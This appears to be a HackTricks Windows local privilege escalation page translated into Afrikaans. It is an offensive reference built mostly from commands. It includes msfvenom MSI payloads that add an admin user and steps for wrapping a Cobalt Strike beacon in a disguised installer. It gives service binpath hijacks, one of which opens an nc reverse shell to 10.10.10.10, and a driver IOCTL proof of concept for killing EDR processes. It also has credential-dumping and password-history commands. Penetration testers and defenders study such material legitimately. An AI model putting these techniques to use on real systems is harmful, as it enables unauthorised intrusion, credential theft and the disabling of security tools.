Windows Local Privilege Escalation

Tip

Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

Beste instrument om na Windows local privilege escalation-vektore te soek: WinPEAS

Aanvanklike Windows-teorie

Access Tokens

As jy nie weet wat Windows Access Tokens is nie, lees die volgende bladsy voordat jy voortgaan:

Access Tokens

ACLs - DACLs/SACLs/ACEs

Kyk na die volgende bladsy vir meer inligting oor ACLs - DACLs/SACLs/ACEs:

ACLs - DACLs/SACLs/ACEs

Integrity Levels

As jy nie weet wat integrity levels in Windows is nie, moet jy die volgende bladsy lees voordat jy voortgaan:

Integrity Levels

Windows Sekuriteitskontroles

Daar is verskeie dinge in Windows wat jou kan voorkom om die stelsel te enumereer, uitvoerbare lêers te laat loop of selfs jou aktiwiteite te bespeur. Jy moet die volgende bladsy lees en al hierdie verdedigings meganismes enumereer voordat jy met die privilege escalation enumerasie begin:

Windows Security Controls

Stelselinligting

Weergawe-inligting en enumerasie

Kontroleer of die Windows-weergawe enige bekende kwesbaarheid het (kontroleer ook watter patches toegepas is).

systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" #Get only that information
wmic qfe get Caption,Description,HotFixID,InstalledOn #Patches
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get system architecture

[System.Environment]::OSVersion.Version #Current OS version
Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
Get-Hotfix -description "Security update" #List only "Security Update" patches

Weergawe Exploits

Hierdie site is handig om gedetailleerde inligting oor Microsoft sekuriteitskwesbaarhede te soek. Hierdie databasis het meer as 4,700 sekuriteitskwesbaarhede, wat die massiewe aanvaloppervlak toon wat ’n Windows-omgewing bied.

Op die stelsel

• post/windows/gather/enum_patches
• post/multi/recon/local_exploit_suggester
• watson
• winpeas (Winpeas het watson ingebed)

Lokaal met stelsel-inligting

• https://github.com/AonCyberLabs/Windows-Exploit-Suggester
• https://github.com/bitsadmin/wesng

Github repos van exploits:

• https://github.com/nomi-sec/PoC-in-GitHub
• https://github.com/abatchy17/WindowsExploits
• https://github.com/SecWiki/windows-kernel-exploits

Omgewing

Is daar enige credential/Juicy info gestoor in die env variables?

set
dir env:
Get-ChildItem Env: | ft Key,Value -AutoSize

PowerShell Geskiedenis

ConsoleHost_history #Find the PATH where is saved

type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
cat (Get-PSReadlineOption).HistorySavePath
cat (Get-PSReadlineOption).HistorySavePath | sls passw

PowerShell Transkripsielêers

Jy kan leer hoe om dit aan te skakel by https://sid-500.com/2017/11/07/powershell-enabling-transcription-logging-by-using-group-policy/

#Check is enable in the registry
reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\Transcription
dir C:\Transcripts

#Start a Transcription session
Start-Transcript -Path "C:\transcripts\transcript0.txt" -NoClobber
Stop-Transcript

PowerShell Module Logging

Besonderhede van PowerShell-pyplynuitvoerings word aangeteken, insluitend uitgevoerde opdragte, opdragaanroepe en dele van skripte. Volledige uitvoeringsbesonderhede en uitsetresultate mag egter nie altyd vasgelê word nie.

Om dit te aktiveer, volg die instruksies in die “Transcript files” afdeling van die dokumentasie, en kies “Module Logging” in plaas van “Powershell Transcription”.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging

Om die laaste 15 gebeure uit die PowersShell logs te bekyk, kan jy die volgende uitvoer:

Get-WinEvent -LogName "windows Powershell" | select -First 15 | Out-GridView

PowerShell Script Block Logging

’n Volledige rekord van aktiwiteit en die volle inhoud van die skrip se uitvoering word vasgelê, wat verseker dat elke blok kode gedokumenteer word terwyl dit loop. Hierdie proses bewaar ’n omvattende ouditspoor van elke aktiwiteit, wat waardevol is vir forensika en die ontleding van kwaadwillige gedrag. Deur alle aktiwiteit tydens uitvoering te dokumenteer, word gedetailleerde insigte in die proses verskaf.

reg query HKCU\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKCU\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging
reg query HKLM\Wow6432Node\Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging

Loggebeure vir die Script Block kan in die Windows Event Viewer gevind word by die pad: Application and Services Logs > Microsoft > Windows > PowerShell > Operational.
Om die laaste 20 gebeure te sien, kan jy gebruik:

Get-WinEvent -LogName "Microsoft-Windows-Powershell/Operational" | select -first 20 | Out-Gridview

Internetinstellings

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

Stasies

wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root

WSUS

Jy kan die stelsel kompromitteer as die updates nie met httpS versoek word nie, maar met http.

Jy begin deur te kontroleer of die netwerk ’n nie-SSL WSUS-update gebruik deur die volgende in cmd uit te voer:

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer

Of die volgende in PowerShell:

Get-ItemProperty -Path HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate -Name "WUServer"

As jy ’n antwoord kry soos een van die volgende:

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer    REG_SZ    http://xxxx-updxx.corp.internal.com:8535

WUServer     : http://xxxx-updxx.corp.internal.com:8530
PSPath       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows\windowsupdate
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies\microsoft\windows
PSChildName  : windowsupdate
PSDrive      : HKLM
PSProvider   : Microsoft.PowerShell.Core\Registry

En as HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer of Get-ItemProperty -Path hklm:\software\policies\microsoft\windows\windowsupdate\au -name "usewuserver" gelyk is aan 1.

Dan, is dit uitbuitbaar. As die laaste register gelyk is aan 0, sal die WSUS-inskrywing geïgnoreer word.

Om hierdie kwesbaarheid te eksploiteer kan jy gereedskap gebruik soos: Wsuxploit, pyWSUS - Dit is MiTM-gewekte exploit-skripte om ‘fake’ updates in nie-SSL WSUS-verkeer in te voeg.

Lees die navorsing hier:

WSUS CVE-2020-1013

Read the complete report here.
Basies is dit die fout wat hierdie bug uitbuit:

If we have the power to modify our local user proxy, and Windows Updates uses the proxy configured in Internet Explorer’s settings, we therefore have the power to run PyWSUS locally to intercept our own traffic and run code as an elevated user on our asset.

Furthermore, since the WSUS service uses the current user’s settings, it will also use its certificate store. If we generate a self-signed certificate for the WSUS hostname and add this certificate into the current user’s certificate store, we will be able to intercept both HTTP and HTTPS WSUS traffic. WSUS uses no HSTS-like mechanisms to implement a trust-on-first-use type validation on the certificate. If the certificate presented is trusted by the user and has the correct hostname, it will be accepted by the service.

Jy kan hierdie kwesbaarheid uitbuit met die hulpmiddel WSUSpicious (sodra dit beskikbaar is).

Third-Party Auto-Updaters and Agent IPC (local privesc)

Baie enterprise agents bied ’n localhost IPC-oppervlak en ’n bevoorregte update-kanaal. As enrollment gedwing kan word na ’n aanvallerbediener en die updater ’n rogue root CA of swak signer- kontrole vertrou, kan ’n plaaslike gebruiker ’n kwaadwillige MSI lewer wat die SYSTEM-diens installeer. Sien ’n gegeneraliseerde tegniek (gebaseer op die Netskope stAgentSvc ketting – CVE-2025-0309) hier:

Abusing Auto Updaters And Ipc

KrbRelayUp

’n Local privilege escalation-kwesbaarheid bestaan in Windows domain omgewings onder spesifieke voorwaardes. Hierdie voorwaardes sluit omgewings in waar LDAP signing nie afgedwing is nie, gebruikers self-regte het wat hulle toelaat om Resource-Based Constrained Delegation (RBCD) te konfigureer, en die vermoë het om rekenaars binne die domein te skep. Dit is belangrik om te noem dat hierdie vereistes nagekom word met standaardinstellings.

Vind die exploit in https://github.com/Dec0ne/KrbRelayUp

Vir meer inligting oor die vloei van die aanval kyk https://research.nccgroup.com/2019/08/20/kerberos-resource-based-constrained-delegation-when-an-image-change-leads-to-a-privilege-escalation/

AlwaysInstallElevated

As hierdie 2 registerwaardes geaktiveer is (waarde is 0x1), kan gebruikers met enige bevoegdheid installeer (uitvoer) *.msi-lêers as NT AUTHORITY\SYSTEM.

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

Metasploit payloads

msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi-nouac -o alwe.msi #No uac format
msfvenom -p windows/adduser USER=rottenadmin PASS=P@ssword123! -f msi -o alwe.msi #Using the msiexec the uac wont be prompted

As jy ’n meterpreter-sessie het, kan jy hierdie tegniek outomatiseer met die module exploit/windows/local/always_install_elevated

PowerUP

Gebruik die Write-UserAddMSI opdrag van PowerUP om binne die huidige gids ’n Windows MSI-binaris te skep om verhoogde regte te verkry. Hierdie skrip skryf ’n vooraf-gekompileerde MSI-installer wat vir ’n gebruiker/groep-toevoeging vra (dus sal jy GUI-toegang nodig hê):

Write-UserAddMSI

Voer net die geskepte binary uit om verhoogde regte te verkry.

MSI Wrapper

Lees hierdie handleiding om te leer hoe om ’n MSI wrapper met hierdie gereedskap te skep. Let daarop dat jy ’n “.bat” lêer kan inpak as jy net opdragreëls wil uitvoer

MSI Wrapper

Skep MSI met WIX

Create MSI with WIX

Skep MSI met Visual Studio

• Genereer met Cobalt Strike of Metasploit ’n nuwe Windows EXE TCP payload in C:\privesc\beacon.exe
• Open Visual Studio, kies Create a new project en tik “installer” in die soekkassie. Kies die Setup Wizard projek en klik Next.
• Gee die projek ’n naam, soos AlwaysPrivesc, gebruik C:\privesc as die ligging, kies place solution and project in the same directory, en klik Create.
• Hou aan om Next te klik totdat jy by stap 3 van 4 uitkom (kies lêers om in te sluit). Klik Add en kies die Beacon payload wat jy net gegenereer het. Klik dan Finish.
• Merk die AlwaysPrivesc projek in die Solution Explorer en verander in die Properties TargetPlatform van x86 na x64.
• Daar is ander eienskappe wat jy kan verander, soos die Author en Manufacturer wat die geïnstalleerde app meer legitiem laat lyk.
• Regsklik die projek en kies View > Custom Actions.
• Regsklik Install en kies Add Custom Action.
• Dubbelklik op Application Folder, kies jou beacon.exe lêer en klik OK. Dit sal verseker dat die beacon payload uitgevoer word sodra die installer begin.
• Onder die Custom Action Properties, verander Run64Bit na True.
• Bou dit uiteindelik.
• As die waarskuwing File 'beacon-tcp.exe' targeting 'x64' is not compatible with the project's target platform 'x86' verskyn, maak seker jy stel die platform op x64.

MSI Installasie

Om die installasie van die kwaadwillige .msi lêer op die agtergrond uit te voer:

msiexec /quiet /qn /i C:\Users\Steve.INFERNO\Downloads\alwe.msi

Om hierdie kwesbaarheid uit te buit kan jy gebruik: exploit/windows/local/always_install_elevated

Antivirus en Detektors

Ouditinstellings

Hierdie instellings bepaal wat aangeteken word, dus moet jy aandag skenk

reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Audit

WEF

Windows Event Forwarding, dit is interessant om te weet waarheen die logs gestuur word

reg query HKLM\Software\Policies\Microsoft\Windows\EventLog\EventForwarding\SubscriptionManager

LAPS

LAPS is ontwerp vir die management of local Administrator passwords, en verseker dat elke wagwoord unique, randomised, and regularly updated is op rekenaars wat by ’n domain aangesluit is. Hierdie wagwoorde word veilig gestoor binne Active Directory en kan slegs deur gebruikers geraadpleeg word wat voldoende toestemmings via ACLs verleen is, wat hulle toelaat om local admin passwords te sien as hulle gemagtig is.

LAPS

WDigest

As dit aktief is, plain-text passwords are stored in LSASS (Local Security Authority Subsystem Service).
More info about WDigest in this page.

reg query 'HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest' /v UseLogonCredential

LSA Protection

Vanaf Windows 8.1 het Microsoft verbeterde beskerming vir die Local Security Authority (LSA) ingestel om pogings deur onbetroubare prosesse te blokkeer om sy geheue te lees of kode in te spuit, wat die stelsel verder beveilig.
More info about LSA Protection here.

reg query 'HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA' /v RunAsPPL

Credentials Guard

Credential Guard is in Windows 10 bekendgestel. Sy doel is om die credentials wat op ’n toestel gestoor is, te beskerm teen bedreigings soos pass-the-hash attacks.| More info about Credentials Guard here.

reg query 'HKLM\System\CurrentControlSet\Control\LSA' /v LsaCfgFlags

Gekasde aanmeldbewyse

Domain credentials word geverifieer deur die Local Security Authority (LSA) en deur bedryfstelskomponente gebruik. Wanneer ’n gebruiker se aanmelddata deur ’n geregistreerde security package geverifieer word, word domein-aanmeldbewyse vir die gebruiker gewoonlik opgestel.
Meer inligting oor Gekasde aanmeldbewyse hier.

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON" /v CACHEDLOGONSCOUNT

Gebruikers & Groepe

Enumereer Gebruikers & Groepe

Jy moet kyk of enige van die groepe waarvan jy deel is interessante toestemmings het

# CMD
net users %username% #Me
net users #All local users
net localgroup #Groups
net localgroup Administrators #Who is inside Administrators group
whoami /all #Check the privileges

# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Bevoorregte groepe

As jy lid is van ’n bevoorregte groep, kan jy moontlik voorregte eskaleer. Lees hier oor bevoorregte groepe en hoe om dit te misbruik om voorregte te eskaleer:

Privileged Groups

Token manipulasie

Lees meer oor wat ’n token is op hierdie bladsy: Windows Tokens.
Kyk na die volgende bladsy om te leer oor interessante tokens en hoe om dit te misbruik:

Abusing Tokens

Aangemelde gebruikers / Sessies

qwinsta
klist sessions

Tuismappe

dir C:\Users
Get-ChildItem C:\Users

Wagwoordbeleid

net accounts

Kry die inhoud van die knipbord

powershell -command "Get-Clipboard"

Lopende Prosesse

Lêer- en vouertoestemmings

Eerstens, deur die prosesse op te som, kontroleer of daar wagwoorde in die opdragreël van die proses is.
Kyk of jy ’n lopende binêre kan oorskryf of of jy skryftoestemmings op die binêre vouer het om moontlike DLL Hijacking attacks uit te buit:

Tasklist /SVC #List processes running and services
tasklist /v /fi "username eq system" #Filter "system" processes

#With allowed Usernames
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize

#Without usernames
Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id

Kontroleer altyd vir moontlike electron/cef/chromium debuggers wat loop, jy kan dit misbruik om escalate privileges.

Kontroleer die permissies van die proses se binaries

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v "system32"^|find ":"') do (
for /f eol^=^"^ delims^=^" %%z in ('echo %%x') do (
icacls "%%z"
2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo.
)
)

Kontroleer die toestemmings van die vouers van die prosesse se binêre lêers (DLL Hijacking)

for /f "tokens=2 delims='='" %%x in ('wmic process list full^|find /i "executablepath"^|find /i /v
"system32"^|find ":"') do for /f eol^=^"^ delims^=^" %%y in ('echo %%x') do (
icacls "%%~dpy\" 2>nul | findstr /i "(F) (M) (W) :\\" | findstr /i ":\\ everyone authenticated users
todos %username%" && echo.
)

Memory Password mining

Jy kan ’n memory dump van ’n running process skep met procdump van sysinternals. Dienste soos FTP het die credentials in clear text in memory, probeer die memory te dump en lees die credentials.

procdump.exe -accepteula -ma <proc_name_tasklist>

Onveilige GUI-toepassings

Programme wat as SYSTEM loop kan ’n gebruiker toelaat om ’n CMD te begin, of gidse te blaai.

Voorbeeld: “Windows Help and Support” (Windows + F1), soek na “command prompt”, klik op “Click to open Command Prompt”

Dienste

Service Triggers laat Windows toe om ’n service te begin wanneer sekere toestande voorkom (named pipe/RPC endpoint activity, ETW events, IP availability, device arrival, GPO refresh, etc.). Selfs sonder SERVICE_START-regte kan jy dikwels geprivilegieerde services begin deur hul triggers af te vuur. Sien enumerasie- en aktiveringstegnieke hier:

Service Triggers

Kry ’n lys van dienste:

net start
wmic service list brief
sc query
Get-Service

Permissies

Jy kan sc gebruik om inligting oor ’n diens te kry

sc qc <service_name>

Dit word aanbeveel om die binêre accesschk van Sysinternals te hê om die vereiste bevoegdheidsvlak vir elke diens te kontroleer.

accesschk.exe -ucqv <Service_Name> #Check rights for different groups

Dit word aanbeveel om te kontroleer of “Authenticated Users” enige diens kan wysig:

accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv %USERNAME% * /accepteula
accesschk.exe -uwcqv "BUILTIN\Users" * /accepteula 2>nul
accesschk.exe -uwcqv "Todos" * /accepteula ::Spanish version

You can download accesschk.exe for XP for here

Aktiveer diens

As jy hierdie fout kry (byvoorbeeld met SSDPSRV):

System error 1058 has occurred.
The service cannot be started, either because it is disabled or because it has no enabled devices associated with it.

Jy kan dit aktiveer deur

sc config SSDPSRV start= demand
sc config SSDPSRV obj= ".\LocalSystem" password= ""

Neem in ag dat die diens upnphost van SSDPSRV afhanklik is om te werk (vir XP SP1)

Nog ’n workaround van hierdie probleem is om die volgende uit te voer:

sc.exe config usosvc start= auto

Modify service binary path

In die scenario waar die “Authenticated users” groep SERVICE_ALL_ACCESS op ’n service het, is dit moontlik om die service se uitvoerbare binêre te wysig. Om te wysig en sc uit te voer:

sc config <Service_Name> binpath= "C:\nc.exe -nv 127.0.0.1 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config <Service_Name> binpath= "net localgroup administrators username /add"
sc config <Service_Name> binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"

sc config SSDPSRV binpath= "C:\Documents and Settings\PEPE\meter443.exe"

Herbegin diens

wmic service NAMEOFSERVICE call startservice
net stop [service name] && net start [service name]

Privilegieë kan verhef word deur verskeie toestemmings:

• SERVICE_CHANGE_CONFIG: Laat herkonfigurering van die service binary toe.
• WRITE_DAC: Maak dit moontlik om permissies te herkonfigureer, wat lei tot die vermoë om service-konfigurasies te verander.
• WRITE_OWNER: Laat toe om eienaarskap te verkry en permissies te herkonfigureer.
• GENERIC_WRITE: Erf die vermoë om service-konfigurasies te verander.
• GENERIC_ALL: Erf ook die vermoë om service-konfigurasies te verander.

Vir die opsporing en uitbuiting van hierdie kwetsbaarheid kan die exploit/windows/local/service_permissions gebruik word.

Swak toestemmings op service binaries

Kontroleer of jy die binary wat deur ’n service uitgevoer word kan wysig of as jy skryfpermissies op die gids het waar die binary geleë is (DLL Hijacking).
Jy kan elke binary wat deur ’n service uitgevoer word kry met wmic (nie in system32 nie) en jou permissies nagaan met icacls:

for /f "tokens=2 delims='='" %a in ('wmic service list full^|find /i "pathname"^|find /i /v "system32"') do @echo %a >> %temp%\perm.txt

for /f eol^=^"^ delims^=^" %a in (%temp%\perm.txt) do cmd.exe /c icacls "%a" 2>nul | findstr "(M) (F) :\"

Jy kan ook sc en icacls gebruik:

sc query state= all | findstr "SERVICE_NAME:" >> C:\Temp\Servicenames.txt
FOR /F "tokens=2 delims= " %i in (C:\Temp\Servicenames.txt) DO @echo %i >> C:\Temp\services.txt
FOR /F %i in (C:\Temp\services.txt) DO @sc qc %i | findstr "BINARY_PATH_NAME" >> C:\Temp\path.txt

Wysig toestemmings van die Dienste-register

Jy moet nagaan of jy enige Dienste-register kan wysig.
Jy kan jou toestemmings oor ’n diens register nagaan deur:

reg query hklm\System\CurrentControlSet\Services /s /v imagepath #Get the binary paths of the services

#Try to write every service with its current content (to check if you have write permissions)
for /f %a in ('reg query hklm\system\currentcontrolset\services') do del %temp%\reg.hiv 2>nul & reg save %a %temp%\reg.hiv 2>nul && reg restore %a %temp%\reg.hiv 2>nul && echo You can modify %a

get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "<Username> Users Path Everyone"

Daar moet nagegaan word of Authenticated Users of NT AUTHORITY\INTERACTIVE die FullControl toestemmings het. Indien wel, kan die binary wat deur die diens uitgevoer word, verander word.

Om die Path van die uitgevoerde binary te verander:

reg add HKLM\SYSTEM\CurrentControlSet\services\<service_name> /v ImagePath /t REG_EXPAND_SZ /d C:\path\new\binary /f

Services register AppendData/AddSubdirectory toestemmings

As jy hierdie toestemming oor ’n register het, beteken dit dat jy subregisters van hierdie een kan skep. In die geval van Windows-dienste is dit genoeg om arbitrêre kode uit te voer:

AppendData/AddSubdirectory permission over service registry

Dienspaaie sonder aanhalingstekens

As die pad na ’n uitvoerbare lêer nie binne aanhalingstekens staan nie, sal Windows probeer om elke gedeelte voor ’n spasie uit te voer.

Byvoorbeeld, vir die pad C:\Program Files\Some Folder\Service.exe sal Windows probeer om die volgende uit te voer:

C:\Program.exe
C:\Program Files\Some.exe
C:\Program Files\Some Folder\Service.exe

Lys alle ongeciteerde dienspaaie, uitgesluit dié wat behoort aan ingeboude Windows-dienste:

wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v '\"'
wmic service get name,displayname,pathname,startmode | findstr /i /v "C:\\Windows\\system32\\" |findstr /i /v '\"'  # Not only auto services

# Using PowerUp.ps1
Get-ServiceUnquoted -Verbose

for /f "tokens=2" %%n in ('sc query state^= all^| findstr SERVICE_NAME') do (
for /f "delims=: tokens=1*" %%r in ('sc qc "%%~n" ^| findstr BINARY_PATH_NAME ^| findstr /i /v /l /c:"c:\windows\system32" ^| findstr /v /c:""""') do (
echo %%~s | findstr /r /c:"[a-Z][ ][a-Z]" >nul 2>&1 && (echo %%n && echo %%~s && icacls %%s | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%") && echo.
)
)

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name

Jy kan opspoor en exploit hierdie kwesbaarheid met metasploit: exploit/windows/local/trusted\_service\_path Jy kan handmatig ’n diens-binarie skep met metasploit:

msfvenom -p windows/exec CMD="net localgroup administrators username /add" -f exe-service -o service.exe

Herstel-aksies

Windows laat gebruikers toe om aksies te spesifiseer wat geneem moet word as ’n diens faal. Hierdie funksie kan gekonfigureer word om na ’n binary te wys. As hierdie binary vervangbaar is, kan privilege escalation moontlik wees. Meer besonderhede is te vinde in die amptelike dokumentasie.

Toepassings

Geïnstalleerde toepassings

Kontroleer die regte van die binaries (dalk kan jy een oorskryf en privilege escalation) en van die lêergidse (DLL Hijacking).

dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
reg query HKEY_LOCAL_MACHINE\SOFTWARE

Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name

Skryftoestemmings

Kontroleer of jy ’n config file kan wysig om ’n spesiale lêer te lees, of ’n binary kan wysig wat deur ’n Administrator account uitgevoer gaan word (schedtasks).

Een manier om swak folder/files permissions in die stelsel te vind, is om die volgende te doen:

accesschk.exe /accepteula
# Find all weak folder permissions per drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwdqs "Everyone" c:\
# Find all weak file permissions per drive.
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -uwdqs "Everyone" c:\*.*

icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) :\" | findstr ":\ everyone authenticated users todos %username%"
icacls ":\Program Files (x86)\*" 2>nul | findstr "(F) (M) C:\" | findstr ":\ everyone authenticated users todos %username%"

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}}

Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}

By opstart uitgevoer

Kontroleer of jy ’n registry of binary kan oorskryf wat deur ’n ander gebruiker uitgevoer gaan word.
Lees die volgende bladsy om meer te leer oor interessante autoruns locations to escalate privileges:

Privilege Escalation with Autoruns

Drivers

Kyk vir moontlike third party weird/vulnerable drivers

driverquery
driverquery.exe /fo table
driverquery /SI

If a driver exposes an arbitrary kernel read/write primitive (common in poorly designed IOCTL handlers), you can escalate by stealing a SYSTEM token directly from kernel memory. Sien die stap‑vir‑stap‑tegniek hier:

Arbitrary Kernel Rw Token Theft

Misbruik van ontbrekende FILE_DEVICE_SECURE_OPEN op device objects (LPE + EDR kill)

Sommige ondertekende derde‑party drivers skep hul device object met ’n sterk SDDL via IoCreateDeviceSecure maar vergeet om FILE_DEVICE_SECURE_OPEN in DeviceCharacteristics te stel. Sonder hierdie vlag word die secure DACL nie afgedwing nie wanneer die device via ’n pad met ’n ekstra komponent oopgemaak word, wat enige onprivilegieerde gebruiker toelaat om ’n handle te verkry deur ’n namespace‑pad te gebruik soos:

• \.\DeviceName\anything
• \.\amsdk\anyfile (from a real-world case)

Sodra ’n gebruiker die device kan oopmaak, kan die deur die driver blootgestelde privileged IOCTLs misbruik word vir LPE en tampering. Voorbeelde van vermoëns wat in die wild waargeneem is:

• Gee full-access handles aan arbitrêre prosesse terug (token theft / SYSTEM shell via DuplicateTokenEx/CreateProcessAsUser).
• Onbeperkte raw disk read/write (offline tampering, boot-time persistence tricks).
• Beëindig arbitrêre prosesse, insluitend Protected Process/Light (PP/PPL), wat AV/EDR kill vanaf user land via kernel moontlik maak.

Minimale PoC‑patroon (user mode):

// Example based on a vulnerable antimalware driver
#define IOCTL_REGISTER_PROCESS  0x80002010
#define IOCTL_TERMINATE_PROCESS 0x80002048

HANDLE h = CreateFileA("\\\\.\\amsdk\\anyfile", GENERIC_READ|GENERIC_WRITE, 0, 0, OPEN_EXISTING, 0, 0);
DWORD me = GetCurrentProcessId();
DWORD target = /* PID to kill or open */;
DeviceIoControl(h, IOCTL_REGISTER_PROCESS,  &me,     sizeof(me),     0, 0, 0, 0);
DeviceIoControl(h, IOCTL_TERMINATE_PROCESS, &target, sizeof(target), 0, 0, 0, 0);

Mitigations for developers

• Stel altyd FILE_DEVICE_SECURE_OPEN wanneer jy device objects skep wat bedoel is om deur ’n DACL beperk te word.
• Valideer die oproeperkonteks vir geprivilegieerde operasies. Voeg PP/PPL-kontroles by voordat jy prosesbeëindiging of handle-teruggee toelaat.
• Beperk IOCTLs (access masks, METHOD_*, invoervalidatie) en oorweeg brokered models in plaas van direkte kernel privileges.

Detection ideas for defenders

• Monitor user-mode opens van verdagte device name (e.g., \ .\amsdk*) en spesifieke IOCTL-reekse wat op misbruik dui.
• Dwing Microsoft’s vulnerable driver blocklist af (HVCI/WDAC/Smart App Control) en onderhou jou eie allow/deny-lyste.

PATH DLL Hijacking

If you have write permissions inside a folder present on PATH you could be able to hijack a DLL loaded by a process and escalate privileges.

Check permissions of all folders inside PATH:

for %%A in ("%path:;=";"%") do ( cmd.exe /c icacls "%%~A" 2>nul | findstr /i "(F) (M) (W) :\" | findstr /i ":\\ everyone authenticated users todos %username%" && echo. )

Vir meer inligting oor hoe om hierdie check te misbruik:

Writable Sys Path +Dll Hijacking Privesc

Netwerk

Gedeelde vouers

net view #Get a list of computers
net view /all /domain [domainname] #Shares on the domains
net view \\computer /ALL #List shares of a computer
net use x: \\computer\share #Mount the share locally
net share #Check current shares

hosts file

Kontroleer vir ander bekende rekenaars wat hardcoded in die hosts file is.

type C:\Windows\System32\drivers\etc\hosts

Netwerkinterfaces & DNS

ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft

Open Poorte

Kontroleer vir beperkte dienste van buite

netstat -ano #Opened ports?

Roeteringstabel

route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

ARP Tabel

arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,L

Firewall-reëls

Kyk na hierdie bladsy vir Firewall-verwante opdragte (lys reëls, skep reëls, skakel af, skakel af…)

Meer opdragte vir netwerk-ontleding hier

Windows Subsystem for Linux (wsl)

C:\Windows\System32\bash.exe
